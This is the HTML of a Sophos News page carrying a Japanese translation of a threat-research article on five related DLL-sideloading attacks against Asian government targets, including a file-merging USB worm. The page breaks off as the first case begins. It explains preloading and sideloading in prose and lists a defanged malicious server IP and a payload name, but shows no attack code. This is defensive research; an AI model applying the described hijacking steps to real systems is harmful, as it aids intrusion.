<!DOCTYPE html>
<html lang="ja-JP">
<head>
<meta charset="UTF-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="https://news.sophos.com/xmlrpc.php">
	<link rel="alternate" hreflang="es-419" href="https://news.sophos.com/es-419/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="nl-nl" href="https://news.sophos.com/nl-nl/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="pt-br" href="https://news.sophos.com/pt-br/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="de-de" href="https://news.sophos.com/de-de/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="en-us" href="https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="fr-fr" href="https://news.sophos.com/fr-fr/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="es-es" href="https://news.sophos.com/es-es/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="it-it" href="https://news.sophos.com/it-it/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="ja-jp" href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
	<link rel="alternate" hreflang="zh-tw" href="https://news.sophos.com/zh-tw/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp" />
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl+ '&gtm_auth=d5XceCG5H_eblswmMfURjQ&gtm_preview=env-2&gtm_cookies_win=x';f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-5L6H3LN');</script>
<!-- End Google Tag Manager -->
<title>DLL サイドローディングを用いた 5 件の攻撃の共通点とは &#8211; Sophos News</title>
<meta name='robots' content='max-image-preview:large' />
<!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="8r1qg681OjOolfxmHEY1IYupmTBdyKXc-OPfpgeQHFk" />
<link rel='dns-prefetch' href='//cdn.jsdelivr.net' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Sophos News &raquo; Feed" href="https://news.sophos.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Sophos News &raquo; Comments Feed" href="https://news.sophos.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Sophos News &raquo; DLL サイドローディングを用いた 5 件の攻撃の共通点とは Comments Feed" href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/news.sophos.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='all-css-0' href='https://news.sophos.com/_static/??-eJyNj9EOgjAMRX/I0ZAA+mL8ltE1UC1jWUfM/t6B0UDig4+3vae9F57BsEdZHCmgKjjWBL3M+DDCfbQxg6YsVE3sq2I4wZ64K0zk2JLQRD4dRBCbKRqhwWL+Dy+7vT5AOPu0vVhMkGVgr6BkI45AYjUxhkif/GuRWMaJnAmzJjXvRlsT/Z1lZbBcUkaTxvL/67tN17rrLm1TN+f2BSeIce4=' type='text/css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='global-styles-inline-css'>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</style>
<link rel='stylesheet' id='all-css-2' href='https://news.sophos.com/_static/??/wp-content/themes/sophosnews-2017/style-2021.css,/wp-content/mu-plugins/jetpack-11.5/css/jetpack.css?m=1668553893' type='text/css' media='all' />
<script type="text/javascript" src="https://news.sophos.com/_static/??-eJzTLy/QzcxLzilNSS3WzwKiwtLUokoopZebmaeXVayjj0+Rbm5melFiSSpUsX2uraGZmYWpiaGJuWkWAK+lIic=" ></script><link rel="https://api.w.org/" href="https://news.sophos.com/wp-json/" /><link rel="alternate" type="application/json" href="https://news.sophos.com/wp-json/wp/v2/posts/88054" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://news.sophos.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://news.sophos.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 6.1.1" />
<link rel="canonical" href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/" />
<link rel='shortlink' href='https://news.sophos.com/?p=88054' />
<link rel="alternate" type="application/json+oembed" href="https://news.sophos.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnews.sophos.com%2Fja-jp%2F2022%2F11%2F03%2Ffamily-tree-dll-sideloading-cases-may-be-related-jp%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://news.sophos.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnews.sophos.com%2Fja-jp%2F2022%2F11%2F03%2Ffamily-tree-dll-sideloading-cases-may-be-related-jp%2F&#038;format=xml" />
	<style>img#wpstats{display:none}</style>
		<link rel="amphtml" href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="DLL サイドローディングを用いた 5 件の攻撃の共通点とは" />
<meta property="og:url" content="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/" />
<meta property="og:description" content="同一の DLL ハイジャックの実行フローが何度も使用され、無差別なファイルの取り込みなど、興味深い攻撃結果が生じています。5 件の攻撃を分析し、共通点を発見しました。…" />
<meta property="article:published_time" content="2022-11-03T06:37:57+00:00" />
<meta property="article:modified_time" content="2022-11-18T07:40:27+00:00" />
<meta property="og:site_name" content="Sophos News" />
<meta property="og:image" content="https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?w=640" />
<meta property="og:image:secure_url" content="https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?w=640" />
<meta property="og:image:width" content="640" />
<meta property="og:image:height" content="425" />
<meta property="og:image:alt" content="" />
<meta property="fb:admins" content="28552295016" />
<meta name="twitter:text:title" content="DLL サイドローディングを用いた 5 件の攻撃の共通点とは" />
<meta name="twitter:image" content="https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=32" sizes="32x32" />
<link rel="icon" href="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=180" />
<meta name="msapplication-TileImage" content="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=270" />
		<style type="text/css" id="wp-custom-css">
			/* Responsive YouTube & Vimeo */
iframe[src*="youtube.com"],
iframe[src*="player.vimeo.com"]{
  width: 100%;
  height: auto;
  aspect-ratio: 16 / 9;
}		</style>
		</head>

<body class="post-template-default single single-post postid-88054 single-format-standard group-blog">
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5L6H3LN&gtm_auth=d5XceCG5H_eblswmMfURjQ&gtm_preview=env-2&gtm_cookies_win=x"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<div id="page" class="hfeed site">
	<a class="sr-only" href="#content">コンテンツへスキップ</a>

	
<header class="bg-blue-600" x-data="{ mobileMenu: false, searchField: false }">
	<div class="container">
		<div class="flex items-center justify-between h-16">

			<!-- Logo -->
			<div class="flex-shrink-0">
				<a class="site-logo" href="https://news.sophos.com/ja-jp/" rel="home">
				<svg width="172" height="17" xmlns="http://www.w3.org/2000/svg">
					<g fill="#FFF" fill-rule="evenodd">
						<path d="M113.024 5.298V16.74h-2.595V.259h2.265l7.997 11.49V.26h2.619v16.482h-2.289l-7.997-11.443M126.064.259h10.78v2.307H128.8v4.521h7.549v2.214h-7.55v5.133h8.376v2.307h-11.111V.259M138.478.259h2.855l2.694 12.29L147.29.26h2.783l3.61 12.314L156.005.26h2.783l-3.62 16.482h-2.76l-3.751-12.126-3.426 12.126h-2.784L138.478.259M168.933 4.968v-.283c0-1.318-.778-2.425-3.492-2.425-2.43 0-3.279 1.013-3.279 2.284 0 1.201.708 1.743 2.218 2.073l3.491.776c2.123.448 4.129 1.602 4.129 4.333 0 3.014-1.675 5.274-6.204 5.274-5.214 0-6.559-2.26-6.559-4.52v-.307h2.737v.26c0 1.2.755 2.284 3.774 2.284 2.5 0 3.421-1.084 3.421-2.638 0-1.224-.731-1.907-2.289-2.237l-3.49-.777c-2.407-.517-3.917-1.742-3.917-4.309 0-2.566 1.77-4.756 6.016-4.756 4.553 0 6.18 2.26 6.18 4.639v.33h-2.736M85.303 16.718h8.88c2.492 0 3.549-.15 4.379-.677 1.308-.803 2.139-2.378 2.139-4.162 0-1.457-.504-2.868-1.258-3.622-.981-1.006-2.316-1.382-4.783-1.382h-2.693c-1.208 0-2.097-.05-2.6-.276-.605-.277-.956-.81-.956-1.562 0-.88.427-1.455 1.132-1.632.529-.124 1.14-.124 2.726-.15h7.949V.265h-8.754c-1.963 0-2.843.075-3.598.353-1.737.602-2.921 2.383-2.921 4.518 0 1.458.58 2.745 1.587 3.624.881.753 2.189 1.105 4.202 1.105h3.584c.805 0 1.46.1 1.813.3.678.327 1.08.934 1.08 1.714 0 .652-.301 1.122-.83 1.447-.426.278-1.158.403-2.49.403h-8.588v2.99zm-84.945 0h8.88c2.492 0 3.549-.15 4.38-.677 1.307-.803 2.138-2.378 2.138-4.162 0-1.457-.504-2.868-1.258-3.622-.982-1.006-2.316-1.382-4.783-1.382H7.023c-1.209 0-2.098-.05-2.6-.276-.605-.277-.957-.81-.957-1.562 0-.88.427-1.455 1.132-1.632.53-.124 1.141-.124 2.726-.15h7.95V.265H6.52c-1.964 0-2.844.075-3.6.353C1.185 1.22 0 3 0 5.136 0 6.594.582 7.881 1.587 8.76c.881.753 2.19 1.105 4.203 1.105h3.582c.807 0 1.46.1 1.814.3.678.327 1.08.934 1.08 1.714 0 .652-.3 1.122-.83 1.447-.426.278-1.157.403-2.49.403H.358v2.99zM71.99 4.596c-.52.813-.765 2.118-.765 3.87 0 3.845 1.331 5.595 4.294 5.595 2.915 0 4.248-1.75 4.248-5.546 0-3.847-1.308-5.571-4.248-5.571-1.604 0-2.864.592-3.53 1.652zm10.05-1.897c1.013 1.33 1.58 3.498 1.58 6.039 0 2.882-.914 5.249-2.544 6.555-1.233.986-3.11 1.528-5.335 1.528-3.16 0-5.654-1.037-6.937-2.884-.964-1.355-1.435-3.155-1.435-5.35 0-3.152.866-5.544 2.495-6.826C71.149.726 73.175.158 75.497.158c2.938 0 5.284.913 6.543 2.54zM65.36.279h-3.507v6.73h-6.345V.278h-3.507v16.439h3.507V9.94h6.345v6.778h3.506V.278zM43.533 8.042c.938 0 1.48-.123 1.852-.469.442-.37.715-1.158.715-2.07 0-1.084-.443-1.872-1.208-2.144-.272-.1-.717-.149-1.286-.149h-4.839v4.832h4.766zm-4.766 8.674h-3.507V.278h8.223c2.889 0 3.902.295 4.988 1.504.964 1.036 1.481 2.39 1.481 3.845 0 1.725-.69 3.327-1.826 4.289-.962.813-1.854 1.058-3.728 1.058h-5.63v5.743zM21.665 4.596c-.519.813-.764 2.118-.764 3.87 0 3.845 1.333 5.595 4.297 5.595 2.913 0 4.247-1.75 4.247-5.546 0-3.847-1.308-5.571-4.247-5.571-1.606 0-2.866.592-3.533 1.652zm10.052-1.897c1.014 1.33 1.581 3.498 1.581 6.039 0 2.882-.914 5.249-2.545 6.555-1.233.986-3.11 1.528-5.333 1.528-3.162 0-5.656-1.037-6.94-2.884-.964-1.355-1.432-3.155-1.432-5.35 0-3.152.865-5.544 2.496-6.826C20.825.726 22.85.158 25.173.158c2.938 0 5.286.913 6.544 2.54z"/>
					</g>
				</svg>
				</a>
			</div>

			<!-- Search Field -->
			<div class="lg:flex justify-end flex-grow hidden" x-show="searchField" x-cloak>
				<div class="relative w-1/2 rounded-md shadow-sm">
					<form role="search" method="get" action="https://news.sophos.com/ja-jp/">
						<input
							type="text"
							class="block w-full text-lg text-white placeholder-gray-100 bg-blue-800 border-0 rounded-md font-sansMedium font-medium"
							placeholder="ニュースを検索する"
							x-ref="searchInput"
							name="s"
						/>
						<div class="absolute inset-y-0 right-0 flex items-center px-3">
							<button
								class="hover:opacity-100 opacity-60 p-1 text-xs text-white uppercase rounded-full cursor-pointer"
								type="submit"
							>
								検索							</button>
						</div>
					</form>
				</div>
			</div>

			<!-- Main Nav -->
			<div class="lg:flex items-center flex-grow hidden" x-show="!searchField" x-cloak>
				<div class="flex ml-auto">
				<ul id="menu-ja-jp-primary" class="primary-menu"><li id="menu-item-77800" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77800"><a href="https://news.sophos.com/ja-jp/category/products-services/">製品とサービス<div class="menu-item-description"></div></a></li>
<li id="menu-item-77801" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-77801"><a href="https://news.sophos.com/ja-jp/category/security-operations/">セキュリティ運用<div class="menu-item-description"></div></a></li>
<li id="menu-item-77802" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77802"><a href="https://news.sophos.com/ja-jp/category/threat-research/">脅威の調査<div class="menu-item-description"></div></a></li>
<li id="menu-item-77816" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77816"><a href="https://ai.sophos.com">AI Research<div class="menu-item-description"></div></a></li>
<li id="menu-item-77818" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77818"><a href="https://nakedsecurity.sophos.com">Security News &#038; Tips<div class="menu-item-description"></div></a></li>
</ul>				</div>
			</div>

			<!-- Search button -->
			<div class="lg:block hidden ml-4">
				<div class="flex items-center">
					<button
					class="border-2 border-transparent hover:border-white inline-flex items-center justify-center p-2 text-white rounded-md focus:outline-none transition-colors"
					@click.prevent="searchField = !searchField; $nextTick(() => { setTimeout(() => { $refs.searchInput.focus(); }, 150);});"
					>
						<span class="sr-only">Search</span>
						<!-- Heroicon name: outline/bell -->
						<svg
							class="w-5 h-5"
							xmlns="http://www.w3.org/2000/svg"
							fill="none"
							viewBox="0 0 24 24"
							stroke="currentColor"
							:class="{ 'block': !searchField, 'hidden': searchField }"
						>
							<path
							stroke-linecap="round"
							stroke-linejoin="round"
							stroke-width="3"
							d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"
							/>
						</svg>
						<svg
							class="hidden w-5 h-5"
							xmlns="http://www.w3.org/2000/svg"
							fill="none"
							viewBox="0 0 24 24"
							stroke="currentColor"
							aria-hidden="true"
							:class="{ 'block': searchField, 'hidden': !searchField }"
						>
							<path
							stroke-linecap="round"
							stroke-linejoin="round"
							stroke-width="3"
							d="M6 18L18 6M6 6l12 12"
							/>
						</svg>
					</button>
				</div>
			</div>

			<!-- Mobile menu button -->
			<div class="lg:hidden flex -mr-2">
				<button
					type="button"
					class="hover:text-white hover:bg-blue-800 focus:outline-none hover:ring-2 focus:ring-offset-2 focus:ring-offset-gray-300 focus:ring-white inline-flex items-center justify-center p-2 text-white rounded-md"
					aria-controls="mobile-menu"
					aria-expanded="false"
					@click="mobileMenu = !mobileMenu"
				>
					<span class="sr-only">Open main menu</span>
					<!--
						Heroicon name: outline/menu

						Menu open: "hidden", Menu closed: "block"
					-->
					<svg
					class="block w-6 h-6"
					xmlns="http://www.w3.org/2000/svg"
					fill="none"
					viewBox="0 0 24 24"
					stroke="currentColor"
					:class="{ 'block': !mobileMenu, 'hidden': mobileMenu }"
					>
					<path
						stroke-linecap="round"
						stroke-linejoin="round"
						stroke-width="3"
						d="M4 6h16M4 12h16m-7 6h7"
					/>
					</svg>
					<!--
						Heroicon name: outline/x

						Menu open: "block", Menu closed: "hidden"
					-->
					<svg
					class="hidden w-6 h-6"
					xmlns="http://www.w3.org/2000/svg"
					fill="none"
					viewBox="0 0 24 24"
					stroke="currentColor"
					aria-hidden="true"
					:class="{ 'block': mobileMenu, 'hidden': !mobileMenu }"
					>
					<path
						stroke-linecap="round"
						stroke-linejoin="round"
						stroke-width="3"
						d="M6 18L18 6M6 6l12 12"
					/>
					</svg>
				</button>
			</div>
		</div>
	</div>

	<!-- Mobile menu, show/hide based on menu state. -->
	<div
	class="lg:hidden container"
	x-show="mobileMenu"
	x-cloak
	x-transition:enter="transition-all ease-out duration-100"
	x-transition:enter-start="transform opacity-0 scale-95"
	x-transition:enter-end="transform opacity-100 scale-100"
	x-transition:leave="transition ease-in duration-75"
	x-transition:leave-start="transform opacity-100 scale-100"
	x-transition:leave-end="transform opacity-0 scale-95"
	>
		<div class="pt-2 pb-8 space-y-2">
			<div class="relative rounded-md shadow-sm">
				<form role="search" method="get" action="https://news.sophos.com/ja-jp/">
					<input
						type="text"
						class="focus:ring-blue-600 focus:border-blue-600 sm:text-sm block w-full placeholder-gray-600 border-gray-300 rounded-md"
						placeholder="ニュースを検索"
						name="s"
					/>
					<div
						class="absolute inset-y-0 right-0 flex items-center px-3 pointer-events-none"
					>
						<button class="p-1 text-gray-500 rounded-full" type="submit">
							<span class="sr-only">検索</span>
							<!-- Heroicon name: outline/bell -->
							<svg
								class="w-4 h-4"
								xmlns="http://www.w3.org/2000/svg"
								fill="none"
								viewBox="0 0 24 24"
								stroke="currentColor"
							>
								<path
									stroke-linecap="round"
									stroke-linejoin="round"
									stroke-width="3"
									d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"
								/>
							</svg>
						</button>
					</div>
				</form>
			</div>

			<ul id="menu-ja-jp-primary-1" class="mobile-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77800"><a href="https://news.sophos.com/ja-jp/category/products-services/">製品とサービス<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-77801"><a href="https://news.sophos.com/ja-jp/category/security-operations/">セキュリティ運用<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77802"><a href="https://news.sophos.com/ja-jp/category/threat-research/">脅威の調査<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77816"><a href="https://ai.sophos.com">AI Research<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77818"><a href="https://nakedsecurity.sophos.com">Security News &#038; Tips<div class="menu-item-description"></div></a></li>
</ul>		</div>
	</div>
</header>

	<div id="content">

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		
			
<article id="post-88054" class="post-88054 post type-post status-publish format-standard has-post-thumbnail hentry category-security-operations region-ja-jp">

		<div class="md:mt-16 container mt-8">
		<div class="relative max-w-5xl mx-auto">
				<div
						class="aspect-w-16 aspect-h-9 flex bg-gray-400 bg-right bg-no-repeat bg-cover"
				>
					<img width="1200" height="797" src="https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?w=1200" class="object-cover wp-post-image" alt="" decoding="async" srcset="https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg 4288w, https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?resize=300,199 300w, https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?resize=768,510 768w, https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?resize=1024,680 1024w, https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?resize=1536,1020 1536w, https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?resize=2048,1360 2048w" sizes="(max-width: 1200px) 100vw, 1200px" />				</div>
								<div
						class="left-4 w-24 h-24 lg:left-12 xl:left-16 lg:w-40 lg:h-40 place-items-center absolute top-0 grid  "
				>
										<img
							src="https://news.sophos.com/wp-content/uploads/2022/07/Category-Icon-X-Ops-v2.png"
							alt="セキュリティ運用"
					/>
														</div>
						</div>
	</div>


			
	<header>
		<div class="container mt-8 md:mt-16 md:-mb-4">
			<div class="max-w-4xl mx-auto">

				<h1 class="text-style-h1 mb-8">DLL サイドローディングを用いた 5 件の攻撃の共通点とは</h1>
									<div class="text-xl md:text-2xl -mt-2 mb-6">
						同一の DLL ハイジャックの実行フローが何度も使用され、無差別なファイルの取り込みなど、興味深い攻撃結果が生じています。5 件の攻撃を分析し、共通点を発見しました。					</div>
				
				<div class="text-xl md:text-xl -mt-2">
					<span class="byline">
		作成者				<span class="author vcard">
				<a href="https://news.sophos.com/ja-jp/author/gabor-szappanos/" title="Posts by Gabor Szappanos" class="author url fn" rel="author">Gabor Szappanos</a>				</span>
								</span>
						</div>

				<div class="text-sophos-gray-600 mt-4 text-xs font-sansSemiBold font-semibold leading-tight uppercase">
					<span class="posted-on"><a href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/" rel="bookmark">2022、 11月 3</a></span>				</div>

				<div class="mt-6 space-y-2 space-x-1">
					<a href="https://news.sophos.com/ja-jp/category/security-operations/" class="category-tag-pill">Security Operations</a>				</div>
			</div>
		</div>
	</header><!-- .entry-header -->

	<div class="container md:my-16 xl:my-24 my-8">
	<div class="entry-content lg:prose-lg mx-auto prose max-w-4xl">
		<p>** 本記事は、<a href="https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/">Family Tree: DLL-Sideloading Cases May Be Related</a> の翻訳です。最新の情報は英語記事をご覧ください。**</p>
<div class="text-xl md:text-2xl -mt-2 mb-6">
						同一の DLL ハイジャックの実行フローが何度も使用され、無差別なファイルの取り込みなど、興味深い攻撃結果が生じています。5 件の攻撃を分析し、共通点を発見しました。</div>
<p>ソフォスは、アジアの政府機関を標的とした攻撃を何度も観測しています。いずれの攻撃にも、以前より (<a href="https://news-sophos.go-vip.net/wp-content/uploads/sites/2/2013/05/sophosszappanosplugxmalwarefactoryversion6-rev3.pdf">少なくとも 2013 年から (リンク先: 英語)</a> <a href="https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/">2020 年まで (リンク先: 英語)</a>) 中国ベースの APT グループが好んで用いてきた手法である DLL サイドローディングが関係しています。本記事では、そのうちの 5 件の共通点に注目し、攻撃者が広く知られた効果的な技術をベースにして複雑さやバリエーションを追加し、攻撃を進化させていることを明らかにします。インシデント同士の関連性を理解することで、防御者 (およびお客様) は、攻撃者が誰なのかというだけでなく、どのような脅威が進行中なのか、そして、最善の成果を得るために分析や防御をどのように優先付けすべきかを理解しやすくなります。</p>
<p>5 件のうち最も興味深いのは、USB ワームが東南アジアの組織に侵入した事例です。このワームは、自己増殖する際に、発見したすべてのファイルを特定のディレクトリにコピーします。その中には、<a href="https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/">Mustang Panda</a> や <a href="https://securelist.com/apt-luminousmoth/103332/">LuminousMoth</a> など、他の APT 攻撃グループ由来のコンポーネントも含まれています。3 件の APT グループが関連していることを示す証拠はありません。また、複数の USB ワームが同時にシステムに感染する際に、誤ってファイルを結合してしまうことがあることもわかっています。  (<a href="https://www.sciencedirect.com/science/article/pii/S016740489788131X">25 年以上前に発見</a>された<a href="https://en.wikipedia.org/wiki/Macro_and_security#%22Mating%22_macro_viruses">マクロウイルスの結合</a>にも似た現象です</a>。)</p>
<p>この USB ワームの事例では、同様のコードフロー難読化を用いたローダー DLL や、同一のローダーシェルコードなど、今回観測した他の 4 事例と重複する部分が多く見られます。同じツールを用いる別の攻撃者である可能性もあるため、この USB ワームの事例と他の攻撃の攻撃者が同一であるとは断定できません。しかし、共通点は顕著です。</p>
<p>本記事では 5 件すべてを深く掘り下げて解説します。付録では、USB ワーム攻撃の時系列をさらに詳しく紹介します。さらに、5 件の事例に共通すると考えられるシェルコードの一部を紹介し、これらの事例に関連する 7 つのシナリオを詳しく説明します。最後に、これらの事例に関連するセキュリティ侵害の痕跡 (IoC) を紹介します。痕跡は GitHub でも公開する予定です。</p>
<p>説明に入る前に、まず DLL サイドローディングとは何か、簡単に定義しておきます。よく混同されますが、DLL プリローディングとは別の攻撃です。</p>
<h2>DLL サイドローディングと DLL プリローディング</h2>
<p>DLL サイドローディングおよび DLL プリローディング (検索順序の乗っ取り) は、どちらも実行フローを乗っ取る攻撃ですが、微妙に異なる点があります。</p>
<p><strong>DLL プリローディング (検索順序の乗っ取り) – </strong><a href="https://attack.mitre.org/techniques/T1574/001/"><strong>T1574/001</strong></a></p>
<ul>
<li>DLL プリローディングでは、攻撃者は既存のアプリケーションが (<a href="https://learn.microsoft.com/ja-jp/windows/win32/dlls/dynamic-link-library-search-order">Windows のデフォルトの検索順序)</a>にもとづいて) 正規のライブラリの場所よりも先に検索するディレクトリに、悪意のある DLL を仕掛けます。</li>
<li>たとえば、正規のアプリケーションが <em>dll</em> をロードする時に検索場所が指定されていない場合、アプリケーションはまずカレントディレクトリを検索し、次に Windows の検索順序に従って他のディレクトリを検索します。</li>
<li>攻撃者が検索順序リスト内のディレクトリに書き込む権限を持っている場合、そのディレクトリに <em>dll</em> と名付けられた悪意のある DLL を追加します。正規の DLL がまだメモリに読み込まれておらず、それ以前の検索場所で見つからなかった場合、アプリケーションは悪意のある DLL を読み込みます。</li>
<li>その後、攻撃者は既存の正規のアプリケーションがユーザーによって実行されるのを待つか、あるいはプロセスを (マシンをリブートするなどの方法で) 強制的に実行します。</li>
</ul>
<p><strong>DLL サイドローディング – </strong><a href="https://attack.mitre.org/techniques/T1574/002/"><strong>T1574/002</strong></a></p>
<ul>
<li>DLL プリローディングと同様に、攻撃者は悪意のある DLL を読み込む正規のアプリケーションを埋め込み、呼び出します。これにより、攻撃者はすでにアプリケーションに対してシステムによって付与されている権限を利用できます。</li>
<li>この手法は、<a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading/">REvil をはじめとする</a>さまざまな攻撃者が使用しています。</li>
</ul>
<h2>報告された事例</h2>
<p>多くのユーザーからの報告のおかけで、私たちは本記事で扱う攻撃者の活動を発見することができました。最も基本的な事例を始めとして、複雑な事例をさらに 4 件見ていきます。</p>
<h3>事例 1: 基本的な攻撃</h3>
<p>5 件の攻撃で繰り返し登場する、悪意のあるサーバー 91.245.253[.]52 に注目したのは、この事例がきっかけでした。</p>
<p>この事例は、お客様からのステージャーアラート (DynamicShellcode) により発覚したものです。以下のプロセストレースに示すように、悪意のあるペイロード (SSCE5532.dll) が、コマンドプロンプト経由で実行されます。</p>
